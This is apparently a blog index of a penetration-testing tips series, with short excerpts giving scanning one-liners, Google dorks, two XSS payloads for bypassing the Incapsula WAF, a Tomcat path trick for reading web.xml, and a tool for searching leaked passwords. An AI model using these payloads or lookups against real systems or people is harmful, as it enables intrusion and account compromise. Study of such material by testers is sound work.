Next entry of technique, tool and lecture!
Another entry of Technique, Tool and Lecture! Every hacker's TLC!
Next entry of Technique, Tool and Lecture AKA every hackers TLC!
Next entry of Technique, Tool and Lecture! Every hackers TLC
Next entry of Tecnique Tool and lecture aka every hacker's TLC!
Technique: Basic one liner to clean masscan output cat masscan-output | cut -d ' ' -f4,6 This will return something like this Tool: Drozer - https://labs.f-secure.com/tools/drozer/ Awesome extensive attack framework for Android Apps (Must have) Lecture: Not super technical but very interesting Ochko123 - How the Feds Caught Russian Mega-Carder Roman Seleznev https://www.youtube.com/watch?v=6Chp12sEnWk&t=784s Check out … Continue reading Technique, Tool and Lecture #9
Technique: One line dash loop for running CLI tools on Kali for IP in $(cat ~/Desktop/target); do nikto -host $IP >> ~/Desktop/nitko-output; done; Tool: Nikto Lecture: Drinking from the caffeine firehose we know as shodan https://www.youtube.com/watch?v=5cWck_xcH64 Check out all the entries of this series! Technique Tool and Lecture #14 Technique Tool and Lecture … Continue reading Technique, Tool and Lecture #8
Technique: Google Dork for getting results consisting only of IP addresses. You have to include 2 octets but then can use * for the right. For example if I'm looking for data on 220.127.116.11/16 I can do site:103.10.* or site:103.10.*.* Remember * aren't wildcards but they are as close as you'll get. Also remember that … Continue reading Technique, Tool and Lecture #7
Hi Guys, Time some more hacker's TLC. Or Tips and tricks for penetration testers! Anyway, here we go! Technique: 2 Incapsula WAF XSS Bypasses I haven't had a chance to use these yet but I do encounter Incapsula once in a while so I'll keep then in my bag <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <img/src=q onerror='new Function`al\ert\`1\``'> Source Tool: … Continue reading Technique, Tool and Lecture #6
Technique: Quick and Easy Bypass for Tomcat 8 on Windows https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK Haven't had a chance to use this yet, but I'm sure I will soon Source Tool: Karma So awesome! Lets you search by username, domain or password. For example I can search by … Continue reading Technique, Tool and Lecture #5